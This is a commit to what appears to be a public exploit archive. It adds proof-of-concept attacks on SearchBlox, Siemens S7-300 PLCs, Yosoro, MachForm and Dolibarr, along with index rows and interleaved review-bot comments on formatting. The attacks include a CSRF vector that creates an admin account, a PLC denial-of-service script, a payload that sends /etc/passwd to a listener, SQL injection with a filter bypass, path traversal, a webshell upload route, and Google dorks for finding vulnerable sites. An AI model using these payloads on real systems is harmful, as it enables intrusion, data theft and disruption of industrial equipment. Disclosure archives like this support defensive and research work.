DB: 2018-05-31
6 changes to exploits/shellcodes

Siemens SIMATIC S7-300 CPU - Remote Denial of Service
Procps-ng - Multiple Vulnerabilities
SearchBlox 8.6.6 - Cross-Site Request Forgery
Yosoro 1.0.4 - Remote Code Execution
MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass
Dolibarr 7.0.0 - SQL Injection
parent 96e4f1686b
commit 89ee92def8
7 changed files with 2579 additions and 0 deletions
48
exploits/java/webapps/44801.txt
Normal file
|
@ -0,0 +1,48 @@
|
|||
# Exploit Title: CSRF Privilege Escalation (Creation of an administrator
|
||||
account) on SearchBlox 8.6.6
|
||||
# Exploit Author: Canberk BOLAT, Ahmet GÜREL
|
||||
# Software Link: https://www.searchblox.com/
|
||||
# Version: < = SearchBlox Version 8.6.6
|
||||
# Platform: Java
|
||||
# Tested on: Windows
|
||||
# CVE: CVE-2018-11538
|
||||
|
||||
# 1. DETAILS
|
||||
|
||||
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who
|
||||
is currently authenticated with a web application to execute an unwanted
|
||||
action. The attacker can trick the user into loading a page which may send
|
||||
a request to perform the unwanted action in the background. In the case of
|
||||
Searchblox, we can use CSRF to perform actions on the admin dashboard by
|
||||
targeting an administrator.
|
||||
|
||||
# 2. PoC:
|
||||
|
||||
We assume that Searchblox is installed at http://localhost:8080/. Our
|
||||
target is /searchblox/servlet/UserServlet u_name, u_passwd1, u_passwd2 and
|
||||
role parameter which is the page used to create a new user. The given POC
|
||||
will create a user on the website which has full administrator privileges.
|
||||
|
||||
HTTP Request:
|
||||
|
||||
GET
|
||||
/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser
|
||||
HTTP/1.1
|
||||
Host: localhost:8080
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0)
|
||||
Gecko/20100101 Firefox/59.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost:8080/searchblox/admin/main.jsp?menu1=adm
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
Cookie: JSESSIONID=touluja8tpjc1iiwquoyiigfi;
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
Attack Vector:
|
||||
|
||||
<img src="
|
||||
http://target:8080/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser"
|
||||
width="0" height="0">
|
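Review bot: the header of 44801.txt has no `# Date:` line, which 44802.py and 44803.txt in this commit both carry, and the write-up ends at the attack vector with no remediation section. Add the date. Since the captured request shows the user-creation action accepted as a `GET` carrying only the `JSESSIONID` cookie, also add a closing note that the fix is to require a POST with a per-session anti-CSRF token on `UserServlet`.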
21
exploits/linux/dos/44802.py
Executable file
|
@ -0,0 +1,21 @@
|
|||
# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service
|
||||
# Google Dork: inurl:/Portal/Portal.mwsl
|
||||
# Date: 2018-05-30
|
||||
# Exploit Author: t4rkd3vilz
|
||||
# Vendor Homepage: https://www.siemens.com/
|
||||
# Version: SIMATIC S7-300 CPU family: all versions.
|
||||
# Tested on: Kali Linux
|
||||
# CVE: CVE-2015-2177
|
||||
|
||||
#!/usr/bin/python
|
||||
import socket
|
||||
|
||||
target_address="TargetIP"
|
||||
target_port=80
|
||||
|
||||
buffer = "GET " + "\x42" * 2220 + " HTTP/1.1\r\n\r\n"
|
||||
|
||||
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=sock.connect((target_address,target_port))
|
||||
sock.send(buffer)
|
||||
sock.close()
|
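Review bot: `#!/usr/bin/python` sits on line 10 of 44802.py, below the comment header, so it does not act as an interpreter line even though the file is committed as executable; move it to line 1 or drop it. In the same file `connect=sock.connect((target_address,target_port))` stores a return value that is never used, and `sock.send(buffer)` is passed a `str`, which only works under Python 2, so the header should state the Python version the script was written for.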
2178
exploits/linux/local/44806.txt
Normal file
File diff suppressed because it is too large
17
exploits/macos/webapps/44803.txt
Normal file
|
@ -0,0 +1,17 @@
|
|||
# Exploit title: Yosoro 1.0.4 - Remote Code Execution
|
||||
# Date: 2018-05-29
|
||||
# Exploit Author: Carlo Pelliccioni
|
||||
# Vendor homepage: https://yosoro.coolecho.net/
|
||||
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
|
||||
# Version: 1.0.4
|
||||
# Tested on: MacOS 10.13.4
|
||||
# CVE: CVE-2018-11522
|
||||
# _ _ _ _ _ ___ _ _
|
||||
# | || | __ _ __ | |__| |_ (_)__ __ ___ / __| ___ __ _ _ _ _ (_)| |_ _ _
|
||||
# | __ |/ _` |/ _|| / /| _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| || _|| || |
|
||||
# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_| |_| \__| \_, |
|
||||
|
||||
# Remote Code Execution (CVE-2018-11522)
|
||||
# Payload:
|
||||
|
||||
<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>
|
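Review bot: 44803.txt gives a payload under `# Payload:` but no description of where the markup is rendered, what impact to expect beyond the `/etc/passwd` read shown, or which release fixes it. Add a short details section and a fix or mitigation line. The payload itself points at the root cause to document, a `<webview>` rendered from user content with `nodeintegration` enabled, so the mitigation to record is rendering untrusted markup without Node integration.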
105
exploits/php/webapps/44804.txt
Normal file
|
@ -0,0 +1,105 @@
|
|||
Vendor: Appnitro
|
||||
Product webpage: https://www.machform.com/
|
||||
Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
|
||||
Fix: https://www.machform.com/blog-machform-423-security-release/
|
||||
|
||||
Author: Amine Taouirsa
|
||||
Twitter: @metalamin
|
||||
|
||||
Google dork examples:
|
||||
----------------------
|
||||
"machform" inurl:"view.php"
|
||||
"machform" inurl:"embed.php"
|
||||
|
||||
Summary:
|
||||
---------
|
||||
The form creation platform MachForm from Appnitro is subject to SQL
|
||||
injections that lead to path traversal and arbitrary file upload.
|
||||
|
||||
The application is widely deployed and with some google dorks it’s possible
|
||||
to find various webpages storing sensitive data as credit card numbers with
|
||||
corresponding security codes. Also, the arbitrary file upload can let an
|
||||
attacker get control of the server by uploading a WebShell.
|
||||
|
||||
[1] SQL injection (CVE-2018-6410):
|
||||
-------------------------
|
||||
|
||||
[1.1] Description:
|
||||
The software is subject to SQL injections in the ‘download.php’ file.
|
||||
|
||||
[1.2] Parameters and statement:
|
||||
This SQLi can be found on the parameter ‘q’ which a base64 encoded value
|
||||
for the following parameters:
|
||||
|
||||
$form_id = $params['form_id'];
|
||||
$id = $params['id'];
|
||||
$field_name = $params['el'];
|
||||
$file_hash = $params['hash'];
|
||||
|
||||
|
||||
So the injectable parameters are ‘el’ and ‘form_id’ obtaining error-based,
|
||||
stacked queries and time-based blind SQL injections. This is due to the
|
||||
following vulnerable statement:
|
||||
|
||||
$query = "select {$field_name} from `".MF_TABLE_PREFIX."form_{$form_id}`
|
||||
where id=?";
|
||||
|
||||
|
||||
[1.3] POC
|
||||
Proof of concept to get the first user mail:
|
||||
http:// [URL] / [Machform_folder] /download.php?q=
|
||||
ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy
|
||||
MDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz
|
||||
ZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io
|
||||
UkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF
|
||||
Ul9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=
|
||||
|
||||
Which is the base64 encoding for:
|
||||
el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
|
||||
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
|
||||
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
|
||||
BY x)a) ;&id=1&hash=1&form_id=1
|
||||
|
||||
|
||||
[2] Path traversal (CVE-2018-6409):
|
||||
-----------------------------------
|
||||
|
||||
[2.1] Descrition
|
||||
download.php’ is used to serve stored files from the forms answers.
|
||||
Modifying the name of the file to serve on the corresponding ap_form table
|
||||
leads to a path traversal vulnerability.
|
||||
|
||||
[2.2] POC
|
||||
First we need to change the name for the element on the form:
|
||||
update ap_form_58009 set element_4="../../../../../../.
|
||||
./../../../../../../../../../etc/passwd" where id=1;
|
||||
|
||||
Now in order to be able to download it, we need to access:
|
||||
http:// [URL] / [Machform_folder] /download.php?q=
|
||||
ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0
|
||||
NTgmZm9ybV9pZD01ODAwOQo=
|
||||
|
||||
Which is the base64 encoding for;
|
||||
el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009
|
||||
|
||||
Note that hash is the MD5 of the corresponding filename:
|
||||
md5("../../../../../../../../../../../../../../../../etc/passwd") =
|
||||
402ba0230d6f44a2de590ac11107a458
|
||||
|
||||
[3] Bypass file upload filter (CVE-2018-6411):
|
||||
----------------------------------------------
|
||||
|
||||
When the form is set to filter a blacklist, it automatically add dangerous
|
||||
extensions to the filters.
|
||||
If the filter is set to a whitelist, the dangerous extensions can be
|
||||
bypassed.
|
||||
|
||||
This can be done directly on the database via SQLi
|
||||
update ap_form_elements set element_file_type_list="php",
|
||||
element_file_block_or_allow="a" where form_id=58009 and element_id=4;
|
||||
|
||||
Once uploaded the file can be found and executed in the following URL:
|
||||
http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]
|
||||
|
||||
The filename can be found in the database
|
||||
SELECT element_4 FROM ap_form_58009 WHERE id=1;
|
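Review bot: 44804.txt has no version or date in its header; the affected range appears only in the CSV index title (`MachForm < 4.2.3`) and indirectly in the `Fix:` URL, so state it next to `Vendor:` and `Product webpage:`. In the text, `[2.1] Descrition` should read `Description`, the sentence after it opens with `download.php’` missing its opening quote, and [1.2] reads `which a base64 encoded value` where `which is a` is meant. Section [1.2] would also benefit from one line on the fix for the quoted statement, where `{$field_name}` and `{$form_id}` are interpolated while only `id` is bound: validate `form_id` as an integer and check `el` against the form's known element names.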
204
exploits/php/webapps/44805.txt
Normal file
|
@ -0,0 +1,204 @@
|
|||
# [CVE-2018-10094] Dolibarr SQL Injection vulnerability
|
||||
|
||||
|
||||
## Description
|
||||
|
||||
Dolibarr is an "Open Source ERP & CRM for Business" used by many
|
||||
companies worldwide.
|
||||
|
||||
It is available through [GitHub](https://github.com/Dolibarr/dolibarr)
|
||||
or as distribution packages (e.g .deb package).
|
||||
|
||||
**Threat**
|
||||
|
||||
The application does not handle user input properly and allows execution
|
||||
of arbitrary SQL commands on the database.
|
||||
|
||||
**Expectation**
|
||||
|
||||
Prepared queries should be used in order to avoid SQL injection in user
|
||||
input.
|
||||
|
||||
|
||||
## Vulnerability type
|
||||
|
||||
**CVE ID**: CVE-2018-10094
|
||||
|
||||
**Access Vector**: remote
|
||||
|
||||
**Security Risk**: high
|
||||
|
||||
**Vulnerability**: CWE-89
|
||||
|
||||
**CVSS Base Score**: 7.5
|
||||
|
||||
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
|
||||
|
||||
## Details
|
||||
|
||||
The database connector escapes quotes with the `real_escape_string()`
|
||||
wrapper. However it is still possible to perform injection on integer
|
||||
parameters without quotes.
|
||||
|
||||
```php
|
||||
mysqli.class.php
|
||||
|
||||
/**
|
||||
* Escape a string to insert data
|
||||
*
|
||||
* @param string $stringtoencode String to escape
|
||||
* @return string String escaped
|
||||
*/
|
||||
function escape($stringtoencode)
|
||||
{
|
||||
return $this->db->real_escape_string($stringtoencode);
|
||||
}
|
||||
```
|
||||
|
||||
Additional checks are defined later, which forbit some SQL keywords (e.g
|
||||
`union`, `create`, `insert`). However, by url encoding the payload,
|
||||
these checks are bypassed.
|
||||
|
||||
```php
|
||||
main.inc.php
|
||||
|
||||
/**
|
||||
* Security: SQL Injection and XSS Injection (scripts) protection
|
||||
(Filters on GET, POST, PHP_SELF).
|
||||
*
|
||||
* @param string $val Value
|
||||
* @param string $type 1=GET, 0=POST, 2=PHP_SELF
|
||||
* @return int >0 if there is an injection
|
||||
*/
|
||||
function test_sql_and_script_inject($val, $type)
|
||||
{
|
||||
$inj = 0;
|
||||
// For SQL Injection (only GET are used to be included into bad
|
||||
escaped SQL requests)
|
||||
if ($type == 1)
|
||||
{
|
||||
$inj += preg_match('/updatexml\(/i', $val);
|
||||
$inj += preg_match('/delete\s+from/i', $val);
|
||||
$inj += preg_match('/create\s+table/i', $val);
|
||||
$inj += preg_match('/insert\s+into/i', $val);
|
||||
$inj += preg_match('/select\s+from/i', $val);
|
||||
$inj += preg_match('/into\s+(outfile|dumpfile)/i', $val);
|
||||
}
|
||||
if ($type != 2) // Not common, we can check on POST
|
||||
{
|
||||
$inj += preg_match('/update.+set.+=/i', $val);
|
||||
$inj += preg_match('/union.+select/i', $val);
|
||||
$inj += preg_match('/(\.\.%2f)+/i', $val);
|
||||
}
|
||||
// For XSS Injection done by adding javascript with script
|
||||
// This is all cases a browser consider text is javascript:
|
||||
// When it found '<script', 'javascript:', '<style', 'onload\s=' on
|
||||
body tag, '="&' on a tag size with old browsers
|
||||
// All examples on page: http://ha.ckers.org/xss.html#XSScalc
|
||||
// More on
|
||||
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
|
||||
$inj += preg_match('/<script/i', $val);
|
||||
$inj += preg_match('/<iframe/i', $val);
|
||||
$inj += preg_match('/Set\.constructor/i', $val); // ECMA script 6
|
||||
if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
|
||||
$inj += preg_match('/base[\s]+href/si', $val);
|
||||
$inj += preg_match('/<.*onmouse/si', $val); // onmousexxx can
|
||||
be set on img or any html tag like <img title='...' onmouseover=alert(1)>
|
||||
$inj += preg_match('/onerror\s*=/i', $val); // onerror can be
|
||||
set on img or any html tag like <img title='...' onerror = alert(1)>
|
||||
$inj += preg_match('/onfocus\s*=/i', $val); // onfocus can be
|
||||
set on input text html tag like <input type='text' value='...' onfocus =
|
||||
alert(1)>
|
||||
$inj += preg_match('/onload\s*=/i', $val); // onload can be
|
||||
set on svg tag <svg/onload=alert(1)> or other tag like body <body
|
||||
onload=alert(1)>
|
||||
$inj += preg_match('/onclick\s*=/i', $val); // onclick can be
|
||||
set on img text html tag like <img onclick = alert(1)>
|
||||
$inj += preg_match('/onscroll\s*=/i', $val); // onscroll can be
|
||||
on textarea
|
||||
//$inj += preg_match('/on[A-Z][a-z]+\*=/', $val); // To lock event
|
||||
handlers onAbort(), ...
|
||||
$inj += preg_match('/:|:|:/i', $val); //
|
||||
refused string ':' encoded (no reason to have it encoded) to lock
|
||||
'javascript:...'
|
||||
//if ($type == 1)
|
||||
//{
|
||||
$inj += preg_match('/javascript:/i', $val);
|
||||
$inj += preg_match('/vbscript:/i', $val);
|
||||
//}
|
||||
// For XSS Injection done by adding javascript closing html tags
|
||||
like with onmousemove, etc... (closing a src or href tag with not
|
||||
cleaned param)
|
||||
if ($type == 1) $inj += preg_match('/"/i', $val); // We
|
||||
refused " in GET parameters value
|
||||
if ($type == 2) $inj += preg_match('/[;"]/', $val); // PHP_SELF
|
||||
is a file system path. It can contains spaces.
|
||||
return $inj;
|
||||
}
|
||||
```
|
||||
|
||||
## Proof of Concept : retrieving the database name.
|
||||
|
||||
Payload:
|
||||
|
||||
```
|
||||
1) union select
|
||||
0,1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
|
||||
|
||||
Url-encoded payload:
|
||||
%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
|
||||
```
|
||||
|
||||
```http
|
||||
GET
|
||||
/dolibarr/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
|
||||
HTTP/1.1
|
||||
Host: dolibarr.lab:2080
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
|
||||
Firefox/52.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie:
|
||||
DOLSESSID_cac4a1e49e4040e845340fe919bd202b=qh3ot46kvm95ph0ddd3ujd7je5
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
...
|
||||
|
||||
</a>
|
||||
</td>
|
||||
<td>10.1.26-MariaDB-0+deb9u1</td>
|
||||
<td>2</td>
|
||||
<td></td>
|
||||
<td>1</td>
|
||||
<td>21</td>
|
||||
<td class="nowrap">
|
||||
```
|
||||
|
||||
|
||||
## Affected versions
|
||||
|
||||
* Version 7.0.0 (last stable version as of March 2018) - previous
|
||||
versions are probably also vulnerable but not tested
|
||||
|
||||
## Solution
|
||||
|
||||
Update to 7.0.2
|
||||
([changelog](https://raw.githubusercontent.com/Dolibarr/dolibarr/develop/ChangeLog))
|
||||
|
||||
## Timeline (dd/mm/yyyy)
|
||||
|
||||
* 18/03/2018 : Initial discovery
|
||||
* 17/04/2018 : Contact with the editor
|
||||
* 17/04/2018 : Editor acknowledges the vulnerability
|
||||
* 18/04/2018 : Editor announces fixes in version 7.0.2
|
||||
* 21/05/2018 : Vulnerability disclosure
|
||||
|
||||
## Credits
|
||||
|
||||
* Issam RABHI (i dot rabhi at sysdream dot com)
|
||||
* Kevin LOCATI (k dot locati at sysdream dot com)
|
||||
|
||||
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
|
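Review bot: the heading `## Proof of Concept : retrieving the database name.` does not match the payload, which selects `version()` and gets `10.1.26-MariaDB-0+deb9u1` back in the response, so it retrieves the server version; reword the heading. In the quoted `test_sql_and_script_inject()`, the pattern `'/:|:|:/i'` contradicts its own comment about refusing the encoded form of ':', which suggests the entity-encoded alternatives were decoded when the advisory was pasted; restore them from the upstream source. The `Url-encoded payload:` label also sits inside the same code fence as the raw payload and should be moved outside it.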
|
@ -5983,6 +5983,7 @@ id,file,description,date,author,type,platform,port
|
|||
44758,exploits/windows/dos/44758.html,"Microsoft Edge Chakra - Cross Context Use-After-Free",2018-05-25,"Google Security Research",dos,windows,
|
||||
44759,exploits/multiple/dos/44759.html,"Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write",2018-05-25,"Google Security Research",dos,multiple,
|
||||
44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
|
||||
44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
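Review bot: the new 44802 row files a Siemens SIMATIC S7-300 CPU issue under platform `linux` and path `exploits/linux/dos/`, but the only Linux reference in 44802.py is `# Tested on: Kali Linux`, which is the host the script was run from; classify the entry by the affected device instead. The port column is also left empty although the script sets `target_port=80`, while the 44804 and 44805 rows in this commit fill in `80`.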
|
@ -9748,6 +9749,7 @@ id,file,description,date,author,type,platform,port
|
|||
44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
|
||||
44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
|
||||
44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux,
|
||||
44806,exploits/linux/local/44806.txt,"Procps-ng - Multiple Vulnerabilities",2018-05-30,"Qualys Corporation",local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
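Review bot: the 44806 title `Procps-ng - Multiple Vulnerabilities` names neither an affected version nor a vulnerability class, unlike the neighbouring rows (`GNU Barcode 0.99 - Buffer Overflow`, `GNU Barcode 0.99 - Memory Leak`). Since the diff of 44806.txt is suppressed on this page, the index row is all a reader sees, so add the version range and the main bug classes to the description.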
|
@ -39470,3 +39472,7 @@ id,file,description,date,author,type,platform,port
|
|||
44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java,
|
||||
44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
|
||||
44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,
|
||||
44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,
|
||||
44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
|
||||
44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
|
||||
44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
|
||||
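Review bot: the 44801 row credits only `"Ahmet Gurel"`, while the header of 44801.txt lists `Canberk BOLAT, Ahmet GÜREL`; carry both names into the author column. The same row leaves the port empty although the proof of concept addresses `localhost:8080`, whereas the 44804 and 44805 rows below it fill in `80`.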
|
|
Can't render this file because it is too large.
|